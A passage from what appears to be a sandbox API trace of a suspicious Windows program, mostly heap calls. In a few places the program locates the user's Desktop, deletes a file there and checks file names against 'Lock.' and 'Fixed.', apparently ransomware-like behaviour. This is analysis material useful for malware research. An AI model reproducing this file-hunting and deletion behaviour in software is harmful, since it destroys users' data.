dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0087.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0087.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75510 [0087.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6488 | out: hHeap=0x2af0000) returned 1 [0087.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0087.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0087.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0087.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0087.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0087.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44) returned 0x2a5dac0 [0087.698] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/6yMUE.flv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6yMUE.flv", lpFilePart=0x8cedf4*="6yMUE.flv") returned 0x21 [0087.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dac0 | out: hHeap=0x2af0000) returned 1 [0087.698] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\6yMUE.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\6ymue.flv")) returned 0x20 [0087.698] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6yMUE.flv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="6yMUE.flv", cAlternateFileName="")) returned 0x9a4200 [0087.699] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\6yMUE.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\6ymue.flv")) returned 1 [0087.714] FindNextFileW (in: hFindFile=0x9a4200, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="6yMUE.flv", cAlternateFileName="")) returned 0 [0087.714] FindClose (in: hFindFile=0x9a4200 | out: hFindFile=0x9a4200) returned 1 [0087.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75510 | out: hHeap=0x2af0000) returned 1 [0087.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0087.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0087.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0087.767] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0087.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0087.768] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0087.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0087.768] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66b8 [0087.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0087.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0087.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0087.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0087.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0087.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0087.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75330 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66b8 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0087.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0087.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44) returned 0x2a5d660 [0087.772] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/6yMUE.flv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\6yMUE.flv", lpFilePart=0x8cf650*="6yMUE.flv") returned 0x21 [0087.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d660 | out: hHeap=0x2af0000) returned 1 [0087.772] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\6yMUE.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\6ymue.flv")) returned 0xffffffff [0087.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75330 | out: hHeap=0x2af0000) returned 1 [0087.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0087.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0087.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0087.773] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0087.773] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.773] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0087.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0087.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0087.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0087.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7jATM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0087.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jATM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0087.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ATM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0087.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0087.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0087.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0087.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0087.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0087.774] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0087.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7jATM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0087.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jATM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0087.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ATM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0087.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0087.775] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0087.775] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72748 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0087.776] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.776] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6488 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0087.776] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0087.776] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0087.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa65d8 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0087.777] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0087.777] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0087.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0087.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0087.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0087.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0087.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.777] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.777] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0087.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0087.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0087.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0087.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 